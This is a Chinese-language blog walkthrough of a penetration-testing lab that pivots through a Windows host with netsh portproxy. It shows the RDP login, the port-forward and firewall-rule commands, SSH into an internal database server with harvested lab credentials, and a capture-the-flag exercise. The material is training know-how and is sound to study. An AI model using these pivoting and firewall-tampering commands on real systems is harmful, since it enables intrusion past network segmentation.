Windows 連接埠轉發 - Netsh
Windows 連接埠轉發 - Netsh
Netsh 是內建指令,但需要管理者權限才可使用連接 Port 轉發
可以透過 Netsh 在 Interface 上做到 portproxy
練習環境
攻擊機 192.168.45.160
靶機 192.168.201.64、10.4.201.215
說明如下圖
第一步直接 RDP 進 192.168.201.64
xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.201.64
系統管理員身分執行 cmd
指令 netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.201.64 connectport=22 connectaddress=10.4.201.215
確認 2222 Port 有 Listen
接著查看本機的 2222 Port,確認直接對應到了 10.4.201.215 22 Port
netsh interface portproxy show all
目前的網路連接圖如下
但 MULTISERVER03 的 2222 Port 無法從 kali 攻擊機直接連線,nmap 確認一下
所以要在 Windows 上開啟 Firewall Rule 如下
指令 netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.201.64 localport=2222 action=allow
開好後再 nmap 確認一次,變 OPEN 了
可以直接 SSH 到 Windows 2222 Port 等同於直接進到 10.4.201.215 DB Server 了
指令 ssh database_admin@192.168.201.64 -p2222
密碼是之前拿到的 sqlpass123
目前連線的方式如下圖
刪除 firewall Rule & portproxy 的指令分別如下
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.201.64
頂點練習:啟動 VM 群組 2. 將 /umbraco/netsh_exercise_client.bin 二進位檔案從 MULTISERVER03 下載到您的 Kali 電腦。在 MULTISERVER03 上建立連接埠轉發,可讓您針對 PGDATABASE01 上的連接埠 4545 執行此二進位檔案。連線成功後將返回該標誌。
注意:用於建置 netsh_exercise_client.bin 二進位檔案的來源檔案可以從/umbraco/client_source.zip下載
先下載 /umbraco/netsh_exercise_client.bin
接著下載 /umbraco/client_source.zip
解壓縮後通通放在 1843 資料夾下
RDP 後如法炮製
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.201.64 connectport=4545 connectaddress=10.4.201.215
netstat -anp TCP | find "2222"
netsh interface portproxy show all
Firewall Rule Allow
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.201.64 localport=2222 action=allow
跑指令拿 flag 吧
└─$ ./netsh_exercise_client.bin -i 192.168.201.64 -p 2222
留言
張貼留言